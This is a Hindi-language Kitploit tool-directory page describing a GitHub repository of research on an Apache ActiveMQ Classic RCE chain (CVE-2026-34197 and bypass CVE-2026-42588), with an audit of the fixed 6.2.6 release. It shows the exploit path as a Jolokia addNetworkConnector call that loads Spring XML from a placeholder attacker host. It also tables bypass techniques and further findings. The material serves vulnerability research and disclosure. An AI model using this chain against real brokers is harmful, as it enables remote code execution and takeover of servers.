Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
apache-activemq-rce-research — Apache ActiveMQ Classic RCE अनुसंधान: CVE-2026-34197 / CVE-2026-42588 बाइपास श्रृंखला + hardened-6.2.6 ऑडिट निष्कर्ष + Crowdfense तुलना | Kitploit
उपकरण/GitHubGitHub/dinosn/apache-activemq-rce-research
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubdinosn/apache-activemq-rce-research

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

apache-activemq-rce-research

Apache ActiveMQ Classic RCE अनुसंधान: CVE-2026-34197 / CVE-2026-42588 बाइपास श्रृंखला + hardened-6.2.6 ऑडिट निष्कर्ष + Crowdfense तुलना

रिपॉजिटरी देखें
841 महीना पहलेअभी तक समीक्षित नहीं

Apache ActiveMQ Classic — RCE अनुसंधान

Apache ActiveMQ Classic Jolokia → addNetworkConnector → xbean/Spring-XML रिमोट-कोड-निष्पादन श्रृंखला (CVE-2026-34197 और इसका पैच-बायपास CVE-2026-42588) के लिए निजी अनुसंधान संग्रह, साथ ही फिक्स्ड 6.2.6 रिलीज़ का पूर्ण ऑटो-अनुसंधान ऑडिट और Crowdfense के सार्वजनिक बायपास राइटअप के साथ साइड-बाय-साइड तुलना।

सभी शोषण स्थानीय लैब ब्रोकर्स (Docker / self-hosted) के विरुद्ध किया गया। पेलोड प्लेसहोल्डर अटैकर होस्ट का उपयोग करते हैं।


सामग्री

डिरचरणअंदर क्या है
00-comparison-vs-crowdfense.mdतुलनाहमारा कार्य vs. Crowdfense का "ActiveMQ RCE Bypass" लेख, file:line पर स्रोत-सत्यापित
01-original-cve-2026-34197/मूल पुनरुत्पादनविश्लेषण + PoC स्क्रिप्ट + Spring-XML पेलोड (लैब: activemq-classic:5.18.6)
02-reaudit-apr30/संस्करण मैट्रिक्स5.18.3 / 5.18.6 / 6.1.4 / 6.1.7 पर uid=0; मूल्यांकन + PoC + version-matrix.sh
03-reaudit-42588-42253/लाइव बायपासNo-paren कम्पोज़िट बायपास (42588) + MessageServlet XSS (42253), लाइव पुनरुत्पादित
04-audit-6.2.6/पूर्ण ऑडिटहार्डन्ड 6.2.6 का ऑटो-अनुसंधान ऑडिट: अंतिम रिपोर्ट + निष्कर्ष लेज़र

लैब्स के दौरान उपयोग किए गए वेंडर सोर्स ट्री और बाइनरी डिस्ट्रीब्यूशन जानबूझकर बहिष्कृत हैं (वे अपस्ट्रीम हैं, हमारे नहीं)।


एक पंक्ति में भेद्यता

एक प्रमाणित (6.0.0–6.1.1 पर CVE-2024-32114 के माध्यम से अप्रमाणित) Jolokia कॉलर एक क्राफ्टेड डिस्कवरी URI के साथ BrokerView.addNetworkConnector(uri) को आह्वान करता है, जिसका आंतरिक vm://…?brokerConfig=xbean:<url> ब्रोकर को एक अटैकर-नियंत्रित Spring XML लोड करने के लिए बाध्य करता है, जो ब्रोकर सत्यापन से पहले एक ProcessBuilder बीन को तत्काल इंस्टैंशिएट करता है → OS कमांड निष्पादन।

root@kitploit:~
POST /api/jolokia/  →  BrokerView.addNetworkConnector(String)
  →  static:(vm://evil?brokerConfig=xbean:http://ATTACKER/evil.xml)
  →  VMTransportFactory dynamic broker creation  →  XBeanBrokerFactory
  →  ResourceXmlApplicationContext loads Spring XML  →  ProcessBuilder bean  →  RCE

निष्कर्ष

मुख्य बात: तीन निष्कर्ष रूट/XSS तक लाइव-सिद्ध हैं; 6.2.6 ऑडिट एक व्यापक सेट जोड़ता है जो स्रोत-सत्यापित और प्रतिकूल-मूल्यांकित है, परंतु अभी तक लाइव-विस्फोटित नहीं। 6.2.6 के कोई भी अतिरिक्त निष्कर्ष नए अप्रमाणित RCE नहीं हैं — वेंडर ने उन दरवाजों को बंद कर दिया; शेष जोखिम प्राधिकरण और आउटपुट-एन्कोडिंग की ओर स्थानांतरित हो गया।

सिद्ध शोषण श्रृंखला

6.2.6 ऑडिट से नेट-नए (स्रोत-सत्यापित)

दायरे से बाहर — DoS (सूचीबद्ध, मुख्य नहीं)

MQTT QoS ऑर्डिनल AIOOBE (QoS.values()[ordinal], क्रॉस-प्रोटोकॉल, कोई कॉन्फ़िग नहीं) · OpenWireFormat.DEFAULT_MAX_FRAME_SIZE = Long.MAX_VALUE · OpenWire अनमार्शल में signed-short NegativeArraySizeException · नेगेटिव AMQ_SCHEDULED_REPEAT अमर जॉब।


Crowdfense राइटअप के साथ तुलना

Crowdfense का Apache ActiveMQ RCE Bypass समान श्रृंखला को कवर करता है (वे इसे CVE-2026-34197 के अंतर्गत दर्ज करते हैं; हम बायपास को अपने स्वयं के CVE-2026-42588 के रूप में ट्रैक करते हैं)। दोनों विवरण तीन-परत सुरक्षा पर अभिसरित होते हैं; एकमात्र विचलन परत 2 है।

एक अंतराल: उनकी परत-2 percent-एन्कोडिंग + UNC/WebDAV ट्रिक बिना किसी स्थानीय-राइट प्रिमिटिव के पूर्ण-रिमोट डिलीवरी प्राप्त करती है। जिस क्लासिफायर दोष का यह दुरुपयोग करता है (activemq-spring/Utils.java:123-129, अनडिकोडेड स्ट्रिंग पर एक कच्चा startsWith("file://")) हमारे सटीक स्रोत में मौजूद है — परंतु रिमोट आधा केवल-Windows है (Linux //host/share को स्थानीय पथ के रूप में मानता है), और हमारी लैब Linux थी, इसलिए यह वहाँ प्रयोज्य नहीं था। यह वैसे भी 6.2.6 पर मृत है (VMTransportFactory स्कीम गेट Utils चलने से पहले xbean को अस्वीकार कर देता है)।

अनुवर्ती: एक Windows-होस्टेड 5.19.6 (या कोई भी प्री-5.19.7/6.2.6 बिल्ड) + SMB/WebDAV लिसनर हमें पूर्ण-रिमोट अनुमति-सूची बायपास प्रदर्शित करने देगा — एकमात्र क्षमता जो लेख में है परंतु हमारे एंगेजमेंट ने नहीं दिखाई।


फिक्स (ActiveMQ 6.2.6)

तीन कमिट श्रृंखला को बंद करते हैं: c1b44af11 (पैरेंस के बिना कम्पोज़िट URI सत्यापित करें — parseComposite बिना शर्त + रिकर्स), c2fc7a1d6 (VMTransportFactory स्कीम अनुमति-सूची के माध्यम से डिफ़ॉल्ट रूप से XBeanBrokerFactory को ब्लॉक करें), और be8415f24 (सैंपल-कॉन्फ़िग हार्डनिंग: Jolokia को loopback पर, addNetworkConnector के साथ ऑपरेशन डेनी-सूची)।

टूल डाउनलोड करें
IDनिष्कर्षवर्गगंभीरताप्रमाणीकरणप्रमाण
CVE-2026-34197Jolokia addNetworkConnector → xbean Spring-XML RCERCEक्रिटिकलपोस्ट-ऑथ (6.0.0–6.1.1 पर अनऑथ)5.18.3 / 5.18.6 / 6.1.4 / 6.1.7 पर लाइव — uid=0
CVE-2026-4258834197 डेनीलिस्ट का No-paren कम्पोज़िट-URI बायपासRCE (पैच बायपास)क्रिटिकलपोस्ट-ऑथ34197-पैच्ड 5.19.6 + 6.2.0 पर लाइव — uid=0
CVE-2026-42253MessageServlet हेडर इंजेक्शन → stored XSSइंजेक्शन / XSSमध्यमपोस्ट-ऑथ6.2.0 पर लाइव
IDनिष्कर्षवर्गगंभीरताप्रमाणीकरणटिप्पणियाँ
C1static: डेनीलिस्ट अंतराल → SSRF — static DENIED_TRANSPORT_SCHEMES से अनुपस्थित; addNetworkConnector("static:(tcp://…)") → आउटबाउंड ब्रोकर TCPSSRFमध्यमएडमिन / JMXलेख द्वारा कवर किए गए उसी 34197/42588 डेनीलिस्ट को पार करने वाला सिंक वैरिएंट
B1Durable-subscription क्रॉस-clientId डिलीट IDOR — removeSubscription वायर-सप्लाइड clientId पर कुंजीबद्ध है और AuthorizationBroker में अन-गेटेड हैटूटा हुआ authz / IDORमध्यमपोस्ट-ऑथ (यदि ब्रोकर ऑथ बंद है तो प्री-ऑथ)सबसे स्वच्छ नेट-नया
B3LDAP खाली-पासवर्ड → अनाम बाइंड (LDAPLoginModule, कोई खालीपन गार्ड नहीं)ऑथ बायपासमध्यम (सशर्त)प्री-ऑथडायरेक्ट्री द्वारा अनाम बाइंड स्वीकार करने पर सशर्त
A1–A7कंसोल आउटपुट-एन्कोडिंग इंजेक्शन परिवार — अटैकर-नियंत्रित MessageId.textView (OpenWire v10+ और AMQP) ~7 JSP/REST सिंक + FileSystemBlobStrategy पाथ-ट्रैवर्सल में अनएस्केप्डइंजेक्शननिम्न–मध्यमप्रोड्यूसर → एडमिनडिफ़ॉल्ट रूप से CSP-गेटेड HTML/कंटेंट-इंजेक्शन तक
B2Shiro WildcardPermission कोलन-इंजेक्शन वर्ब-एस्केलेशनPriv-escनिम्न–मध्यमपोस्ट-ऑथShiro गैर-डिफ़ॉल्ट
B4अस्थायी-गंतव्य authz फेल-ओपन विषमता बनाम गैर-अस्थायी फेल-क्लोज़्डटूटा हुआ authzनिम्नपोस्ट-ऑथबाय-डिज़ाइन (AMQ-4721); हार्डनिंग नोट
B5StatisticsBroker replyTo प्लगइन को प्राधिकरण से पहले ऑर्डर करने पर राइट-ACL छोड़ देता हैटूटा हुआ authzनिम्नपोस्ट-ऑथकॉन्फ़िग-ऑर्डर पर निर्भर
B6सर्ट-लॉगिन गैर-कैननिकल DN (getSubjectDN().getName()) → समान-CA सर्टिफिकेट्स के बीच पहचान टकरावऑथनिम्नप्री-ऑथ (TLS-सत्यापित)"कोई भी self-signed सर्टिफिकेट" काम नहीं करता
B7JMSXUserID populateJMSXUserID=false (डिफ़ॉल्ट) होने पर स्पूफ़स्पूफिंगनिम्नपोस्ट-ऑथ—
F5STOMP आउटबाउंड हेडर-नाम कभी एस्केप नहीं किया जाता → सह-टेनेंट सब्सक्राइबर को फ्रेम इंजेक्शनइंजेक्शननिम्नक्रॉस-प्रोटोकॉलSTOMP सक्षम
परतरक्षाCrowdfense इसे कैसे पराजित करता हैहमने इसे कैसे पराजित किया
1स्कीम डेनीलिस्ट (34197 फिक्स)No-paren कम्पोज़िट static:vm://…समान — स्वतंत्र रूप से खोजा गया ✅
2xbean {file,classpath} अनुमति-सूची (#1910)Percent-एन्कोडेड file:%2f%2f… → Windows UNC → WebDAV → रिमोट HTTP फ़ेचस्थानीय फ़ाइल xbean:/tmp/evil.xml (स्थानीय राइट की आवश्यकता)
3VMTransportFactory स्कीम गेट (broker,properties, 42588 / 6.2.6 फिक्स)किल के रूप में स्वीकृतसमान निष्कर्ष ✅